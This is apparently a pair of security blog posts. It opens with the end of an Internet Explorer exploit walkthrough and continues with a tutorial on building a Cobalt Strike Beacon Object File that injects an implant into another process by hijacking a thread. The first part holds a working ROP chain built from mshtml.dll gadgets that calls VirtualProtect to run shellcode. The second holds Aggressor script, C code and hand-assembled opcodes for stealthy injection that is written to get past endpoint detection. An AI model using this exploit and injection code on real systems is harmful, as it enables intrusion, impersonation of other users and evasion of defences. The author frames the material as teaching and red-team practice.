Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";  				   // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";  				   // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking

9 January 2021 at 00:00

Introduction

As people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love everything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also enjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for exploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way around enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it incredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals in order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular remote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a newer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities in C (which makes me incredibly happy as a person). This blog will go over a technique known as thread hijacking and integrating it into a usable Beacon Object File.

However, before beginning, I would like to delineate this post will be focused on the technique of remote process injection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon Object Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As was aforementioned, Cobalt Strike is widely adopted and I think it is a great tool and I am a big proponent of it. I still believe at the end of the day, however, it is more important to understand the overarching concept surrounding a TTP (Tactic, Technique, and Procedure), versus learning how to just arbitrarily run a tool, which in turn will create a bottleneck in your red teaming methodology by relying on a tool itself. If Cobalt Strike went away tomorrow, that shouldn’t render this TTP, or any other TTPs, useless. However, almost contradictorily, this first portion of this post will briefly outline what Beacon Object Files are, a quick recap on remote process injection, and a bit on writing code that adheres to the needs of Beacon Object Files.

Lastly, the final project can be found here.

Beacon Object Files - You have two minutes, go.

Back in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known as Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are executed as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the linking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics, capabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you to check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF development.

One thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be subjective, but as Raphael points out in his video and blog, the main benefit of BOFs are twofold:

  1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work - they’re directly executed as position-independent code within the current Beacon process, increasing overall OPSEC (operational security).
  2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as BOFs expose a set of functions operators can use when developing. This means BOFs are smaller in size and easily allow you to invoke Window APIs and interact with the internal Beacon API.

Additionally, there are a few drawbacks to BOFs:

  1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To compensate for this, however, you can use BOF compliant decorators in your function prototypes with the MSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such functions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.
  2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of internal error and fails, your Beacon process will crash as well. This means BOFs should be carefully vetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a function’s prototype, and cleaning up any opened handles, allocated memory, etc.

Now that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking, as well as outline our BOF’s execution flow.

Remote Process Injection

Remote process injection, for the unfamiliar, is a technique in which an operator can inject code into another process on a machine, under certain circumstances. This is most commonly done with a chain of Windows APIs being called in order to allocate some memory in the other process, write user-defined memory (usually a shellcode of some sort) to that allocation, and kicking off execution by create a thread within the remote process. The APIs, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are often popular choices, respectively.

Why is remote process injection important? Take a look at the image below, which is a listing of processes performed inside of a Cobalt Strike Beacon implant.

As is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also under what user context a certain process is running under. This could be very useful on a penetration test in an Active Directory environment where the goal is to obtain domain administrative access. Let’s say you as an operator obtain access to a server where there are many users logged in, including a user with domain administrative access. This means that there is a great likelihood there will be processes running in context of this high-value user. This concept can be seen below where a second process listing is performed where another user, ANOTHERUSER has a PowerShell.exe process running on the host.

Using Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe process utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a second callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process architecture (64-bit), and the name of the Cobalt Strike listener as arguments.

After the injection, there is a successful callback, resulting in a valid session in context of the OTHERUSER user.

This is useful to a red team operator, as the credentials for the OTHERUSER were not needed in order to obtain access in context of said user. However, there are a few drawbacks - including the addition of endpoint detection and response (EDR) products that detect on such behavior. One of the indicators of compromise (IOC) would be, in this instance, a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog will focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a technique in which an already existing thread within the target process is suspended and manipulated in order to execute shellcode.

Thread Hijacking and Thread Restoration

As mentioned earlier, the process for a typical remote injection is:

  1. Allocate a memory region within the target process using VirtualAllocEx. A handle to the target process must already be existing with an access right of at least PROCESS_VM_OPERATION in order to leverage this API successfully. This handle can be obtained using the Windows API function OpenProcess.
  2. Write your code to the allocated region using WriteProcessMemory. A handle to the target process must already be existing with an access right of at least PROCESS_WRITE and the previously mentioned PROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at minimum to perform remote injection.
  3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread.

Our thread hijacking technique will utilize the first two members of the previous list, but instead of CreateRemoteThread, our workflow will consist of the following:

  1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx and WriteProcessMemory.
  2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot. This loop will contain logic to break upon identifying the first thread within the target process.
  3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread.
  4. Call SuspendThread, passing the former thread handle mentioned as the argument. SuspendThread requires the handle has an access right of THREAD_SUSPEND_RESUME.
  5. Call GetThreadContext, using the thread handle. This function requires that handles have a THREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU registers, processor flags, and other CPU information into a CONTEXT record. This is because each thread has its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to restore the thread once execution has completed.
  6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory. The shellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL. This payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt Strike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post. The Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for the time being.
  7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional shellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the shellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave DllMain, depending on what is specified in the payload by the operator. Because of this, it would not be possible to restore the hijacked thread, as the thread will run the DllMain function until the operator exits the Beacon, since the stageless raw Beacon artifact does not perform a “return”. Due to this, we must create a shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates a local thread within the remote process for the Beacon implant to run. Essentially, this is one of three components our “new” full payload will “carry”, so when execution reaches the remote process, the call to CreaeteThread, which creates a local thread, will allocate the thread in the remote process for Beacon to run in. This means that the hijacked thread will never actually execute the Beacon implant, it will actually execute a small shellcode, made up of three components, that places the Beacon implant into its own local thread, along with a two other routines that will be described here shortly. Up until this point, no code has been executed and everything mentioned is just a synopsis of each component’s purpose.
  8. The custom CreateThread routine is actually executed by being called from another routine that will be wrapped into our final payload, which is a routine for a call to NtContinue. This is the second component of our custom shellcode. After the CreateThread routine is finished executing, it will perform a return back into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the thread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack occurred. NtContinue will be talked about in the latter portions of this post, but for now just know that NtContinue, at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and sets the calling thread to that context. Again, no code has been executed so far. The only thing that has changed is our large “final payload” has added another component to it, NtContinue.
  9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND with the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte aligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-byte aligned. malloc is then invoked to create one giant buffer that all of these “moving parts” are added to.
  10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and WriteProcessMemory, again, the final payload, consisting of the three routines, is injected into the remote process.
  11. Lastly, the previously captured CONTEXT record is updated to point the DWORD.Rip member, which represents the value of the 64-bit instruction pointer, to the address of our full payload.
  12. SetThreadContext is then called, which forces the target thread to be updated to point to the final payload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.

Before moving on, there are two things I would like to call out. The first is the call to CreateThread. At first glance, this may seem like it is not a viable alternative to CreateRemoteThread directly. The benefit of the thread hijacking technique is that even though a thread is created, it is not created from a remote process, it is created locally. This does a few things, including avoiding the common API call chain of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread and secondly, by blending in (a bit more) by calling CreateThread, which is a less scrutinized API call. There are other IOCs to detect this technique. However, I will leave that as an exercise to the reader :-).

Let’s move on and start with come code.

Visual Studio + Beacon Object File Intrinsics

For this project, I will be using Visual Studio and the MSVC Compiler, cl.exe. Feel free to use mingw, as it can also produce BOFs. Let’s go over a few house rules for BOFs before we begin.

In order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use the following command: cl /c /GS- INPUT.c /FoOUTPUT.o. This will compile the C program as an object file only and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the injected stack cookie check functions.

If you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is defined in winnt.h as DECLSPEC_IMPORT. This indicates to the compiler that this function is found within a DLL, telling the compiler essentially “this function will be resolved later” and as mentioned before, since Cobalt Strike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come later, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to “peek” the prototype of a Windows API function. This will suffice in attributing the __declspec(dllimport) keyword to our function prototypes, as the prototypes of most Windows API functions contain a #define directive with a definition of WINBASEAPI, or similar, which already contains a __declspec(dllimport) keyword. An example would be the prototype of the function GetProcAddress, as seen below.

This reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.

Armed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it would be outlined as such:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

The value directly before the $ represents the library the function is found in. The relocation table of the object file, which essentially contains pointers to the list of items the object file needs addresses from, like functions other libraries or object files, will point to the prototyped LIB$Function functions memory address. Cobalt Strike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where applicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the above test case. This blob is then passed to Beacon as a code to be executed. Not reinventing the wheel here, Raphael outlines this all in his wonderful video.

In addition to this, I will hit on one last thing - and that is user-supplied arguments and returning output back to the operator. Beacon exposes an internal API to BOFs, that are outlined in the beacon.h header file, supplied by Cobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, and can return output over Beacon. This API accepts a user-supplied string, as well as #define directive in beacon.h, namely CALLBACK_OUTPUT and CALLBACK_ERROR. For instance, updating the operator with a message would be implemented as such:

BeaconPrintf(CALLBACK_OUTPUT, "[+] Hello World!\n");

For accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The following will be the script used for this post.

# Setup cThreadHijack
alias cThreadHijack {

    # Alias for Beacon ID and args
    local('$bid $listener $pid $payload');
    
    # Set the number of arguments
    ($bid, $pid, $listener) = @_;

    # Determine the amount of arguments
    if (size(@_) != 3)
    {
        berror($bid, "Error! Please enter a valid listener and PID");
		return;
    }

    # Read in the BOF
    $handle = openf(script_resource("cThreadHijack.o"));
    $data = readb($handle, -1);
    closef($handle);

    # Verify PID is an integer
    if ((!-isnumber $pid) || (int($pid) <= 0))
    {
        berror($bid, "Please enter a valid PID!\n");
        return;
    }

    # Generate a new payload 
    $payload = payload_local($bid, $listener, "x64", "thread");
    $handle1 = openf(">out.bin");
    writeb($handle1, $data1);
    closef($handle1);
    
    # Pack the arguments
    # 'b' is binary data and 'i' is an integer
    $args = bof_pack($bid, "ib", $pid, $payload);

    # Run the BOF
    # go = Entry point of the BOF
    beacon_inline_execute($bid, $data, "go", $args);
}

The goal is to be able to supply our BOF to Cobalt Strike, with the very original name cThreadHijack, a PID for injection and the name of the Cobalt Strike listener. The first local statement sets up our variables, which include the ID of the Beacon executing the BOF, listener name, the PID, and payload, which will be generated later. The @_ statement sets an array with the order our arguments will be supplied to the BOF, mean the command to use this BOF would be cThreadHijack "Name of listener" PID. After, error checking is done to determine if 3 arguments have been supplied (two for the PID and listener and the Beacon ID, the third argument, will be supplied to the BOF without us needing to input anything). After the object file is read in and the PID is verified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method. After this, the user-supplied argument $pid is packed as an integer and the newly created $payload variable is packed as a binary value. Then, upon execution in Cobalt Strike, the alias cThreadHijacked is executed with the aforementioned arguments, using the function go as the main entry point. This script must be loaded before executing the BOF.

From the C code side, this is how it looks to set these arguments and define the functions needed for thread hijacking.

The function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied arguments. Then, the value int pid is set to the user-supplied PID, while the char* shellcode value is set to the Beacon implant, meaning everything is in place. Finally, now that details on adhering to BOF’s rules while writing C is out of the way, let’s get into the code.

Open, Enumerate, Suspend, Get, Inject, and Get Out!

The first step in thread hijacking is to first open a handle to the target process. As mentioned before, calls that utilize this handle, VirtualAllocEx and WriteProcessMemory, must have a total access right of PROCESS_VM_OPERATION and PROCESS_VM_WRITE. This can be correlated to the following code.

This function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is opened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot. This routine is sent through a loop and “breaks” upon the first thread of the target PID being reached. When this happens, a call to OpenThread with the rights THREAD_SUSPEND_RESUME, THREAD_SET_CONTEXT, and THREAD_GET_CONTEXT occurs. This allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.

At this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later set its context again.

Once the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not be the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote process in order to use this address later on in the CreateThread routine.

Now that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process address space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.

Beacon - Stay Put!

As previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread. Currently, the implant is just sitting within the desired remote process and has not executed. To do this, we will create a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the CreateThread function prototype.

HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

As mentioned by Microsoft documentation, this function will create a thread to execute within the virtual address space of the calling function. Since we will be injecting this routine into the remote process, when the routine executed, it will create a thread within the remote process. This is beneficial to us, as CreateThread creates a local thread - but since the routine will be executed inside of the remote process, it will spawn a local thread, instead of requiring us to create a thread, remotely, from our current process.

The function argument we will be worried about is LPTHREAD_START_ROUTINE, which is really just a function pointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon implant. We already have this address, as VirtualAllocEx has a return value of type LPVOID, which is a pointer to our shellcode. Let’s get into the development of the routine.

The first step is to declare a BYTE array of 64-bytes. 64-bytes was chosen, as it is divisible by a QWORD, which is a 64-bit address. This is to ensure proper alignment, meaning 8 QWORDS will be used for this routine - which keeps everything nice and aligned. Additionally, we will declare an integer variable to use as a “counter” in order to make sure we are placing our opcodes at the correct index within the BYTE array.

BYTE createThread[64] = { NULL };
int z = 0;

Since we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling convention requires the first four integer arguments (floating-point values are passed in different registers) are passed in the RCX, RDX, R8, and R9 registers, respectively. However, the question remains - CreateThread has a total of six parameters, what do we do with the last two? With __fastcall, the fifth and subsequent parameters are located on the stack at an offset of 0x20 and every 0x8 bytes subsequently. This means, for our purposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28. Here are the parameters used for our purposes.

  1. lpThreadAttributes will be set to NULL. Setting this value to NULL will ensure the thread handle isn’t inherited by child processes.
  2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size for the executable, which is fine for our purposes.
  3. lpStartAddress, as previously mentioned, will be the address of our shellcode. This parameter is a function pointer to be executed by the thread.
  4. lpParameter will be set to NULL, as our thread does not need to inherit any variables.
  5. dwCreationFlags will be set to 0, which informs the thread we would like to thread to run immediately after it is created. This will kick off our Beacon implant, after thread creation.
  6. lpThreadId will be set to NULL, which is of less importance to us - as this will not return a thread ID to the LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it would have been dynamically filled with the thread ID. However, this is not important for purpose of this post.

The first step is to place a value of NULL, or 0, into the RCX register, for the lpThreadAttributes argument. To do this, we can use bitwise XOR.

// xor rcx, rcx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

This performs bitwise XOR with the same two values (RCX), which results in 0 as bitwise XOR with two of the same values results in 0. The result is then placed in the RCX register. Synonymously, we can leverage the same property of XOR for the second parameter, dwStackSize, which is also 0.

// xor rdx, rdx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xd2;

The next step, is really the only parameter we need to specify a specific value for, which is lpStartAddress. Before supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon implant into the desired remote process.

The above code returns the virtual memory address of our allocation into the variable placeRemotely. As can be seen, this return value is of the data type LPVOID, while the lpStartParameter argument takes a data type of LPTHREAD_START_ROUTINE, which is pretty similar with LPVOID. However, for continuity sake, we will first type cast this allocation into an LPTHREAD_START_ROUTINE function pointer.

// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer
LPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;

In order to place this value into the BYTE array, we will need to use a function that can copy this address to the buffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link C-Runtime functions such as memcpy. We can overcome this by creating our own custom memcpy routine, or grabbing one from the MSVCRT library, which Cobalt Strike can link to us. However, for now and for awareness of others, we will leverage a libc.h header file that Raphael created, which can be found here.

Using the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.

// mov r8, LPTHREAD_START_ROUTINE
createThread[z++] = 0x49;
createThread[z++] = 0xb8;
mycopy(createThread + z, &threadCast, sizeof(threadCast));
z += sizeof(threadCast);

Notice how the end of this small shellcode blob contains an update for the array index counter z, to ensure as the array is written to at the correct index. We have the luxury of using a mov r8, LPTHREAD_START_ROUTINE, as our shellcode pointer has already been mapped into the remote process. This will allow the CreateThread routine to find this function pointer, in memory, as it is available within the remote process address space. We must remember that each process on Windows has its own private virtual address space, meaning memory in one user mode process isn’t visible to another user mode process. As we will see with the NtContinue stub coming up, we will actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the structure is located in the current process, while the code will be executing within the desired remote process.

Now that the lpStartAddress parameter has been completed, lpParameter must be set to NULL. Again, this can be done by utilizing bitwise XOR.

// xor r9, r9
createThread[z++] = 0x4d;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

The last two parameters, dwCreationFlags and lpThreadId will be located at an offset of 0x20 and 0x28, respectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we can use to mov instructions, as such.

// mov [rsp+20h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x20;

// mov [rsp+28h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x28;

A quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate we would like to overwrite what that value is pointing to.

The next goal is to resolve the address of CreateThread. Even though we will be resolving this address within the BOF, meaning it will be resolved within the current process, not the desired remote process, the address of CreateThread will be the same across processes, although each user mode process is mapped its own view of kernel32.dll. To resolve this address, we will use the following routine, with BOF denotations in our code.

// Resolve the address of CreateThread
unsigned long long createthreadAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32"), "CreateThread");

// Error handling
if (createthreadAddress == NULL)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve CreateThread. Error: 0x%lx\n", KERNEL32$GetLastError());
}

The unsigned long long variable createthreadAddress will be filled with the address of CreateThread. unsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although KERNEL32$GetProcAddress has a prototype with a return value of FARPROC, we need the address to actually be of the type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine with mycopy. The next goal is to move the address of CreateThread into RAX. After this, we will perform a call rax instruction, which will kick off the routine. This can be seen below.

// mov rax, CreateThread
createThread[z++] = 0x48;
createThread[z++] = 0xb8;
mycopy(createThread + z, &createthreadAddress, sizeof(createthreadAddress));
z += sizeof(createthreadAddress);

// call rax (call CreateThread)
createThread[z++] = 0xff;
createThread[z++] = 0xd0;

Additionally, we want to add a ret opcode. The way our full payload will be setup is as follows:

  1. A call to the stack alignment/CreateThread routine will be made firstly (the stack alignment routine will be hit on in a latter portion of this blog). When a call instruction is executed, it pushes a return address onto the stack. This is the address that ret will jump to in order to continue execution of the payload. When the stack alignment/CreateThread routine is called, it will push a return address onto the stack. This return address will actually be the address of the NtContinue routine.
  2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force execution back to the NtContinue routine. This will all be outlined when executed is examined inside of WinDbg.
  3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue routine. The first instruction in the NtContinue routine will be a call to the stack alignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine, where thread execution will be restored. Here is a quick visual.

PAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -> stack alignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode performs a return back to the NtContinue shellcode -> NtContinue shellcode finishes executing, which restores the thread

